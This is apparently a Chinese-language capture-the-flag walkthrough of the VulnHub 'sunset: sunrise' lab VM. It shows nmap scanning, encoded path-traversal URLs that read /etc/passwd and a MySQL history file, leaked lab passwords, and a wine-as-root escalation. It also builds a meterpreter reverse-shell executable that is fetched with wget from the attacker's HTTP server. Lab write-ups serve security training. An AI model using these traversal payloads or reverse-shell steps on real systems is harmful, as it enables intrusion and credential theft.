Sunset靶机
仅供个人娱乐
靶机信息
https://www.vulnhub.com/entry/sunset-sunrise,406/
一、主机探测
![](https://upload-images.jianshu.io/upload_images/4664072-3b101dd224c44d17.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、信息收集
nmap -sS -sV -T5 -A -p-
![](https://upload-images.jianshu.io/upload_images/4664072-b794763f8e3c3b0e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7c8f469fd18bc26d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.174.132:8080/
![](https://upload-images.jianshu.io/upload_images/4664072-c788a01e48dbfbc7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-0a2f08b15c049833.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ad7c2a8b946ed4aa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ad1ed9561b146835.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
三、漏洞利用
构造poc
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
![](https://upload-images.jianshu.io/upload_images/4664072-f73428f1be7598d8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2f
![](https://upload-images.jianshu.io/upload_images/4664072-28debee058e491c0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
![](https://upload-images.jianshu.io/upload_images/4664072-c3db7dea013aee48.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
![](https://upload-images.jianshu.io/upload_images/4664072-46140c4183df7301.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history
![](https://upload-images.jianshu.io/upload_images/4664072-d5b5d9b67d9b6f95.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
weborf/iheartrainbows44
![](https://upload-images.jianshu.io/upload_images/4664072-a665797d0a68dd86.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d3c8d811deacb196.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
sunrise thefutureissobrightigottawearshades
root *C7B6683EEB8FF8329D8390574FAA04DD04B87C58
![](https://upload-images.jianshu.io/upload_images/4664072-536e5d7e07365ab8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-218c51061f3a3215.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
以root执行wine命令,wine可以执行exe程序
msfpc windows 192.168.174.128
![](https://upload-images.jianshu.io/upload_images/4664072-0b1549c940ffc335.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -m SimpleHTTPServer 8888
use exploit/multi/handler
set encoder x86/shikata_ga_nai
set lhost 192.168.174.132
set lport 443
run
wget http://192.168.174.128:8888/windows-meterpreter-staged-reverse-tcp-443.exe
![](https://upload-images.jianshu.io/upload_images/4664072-d67ef6e30341ddba.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)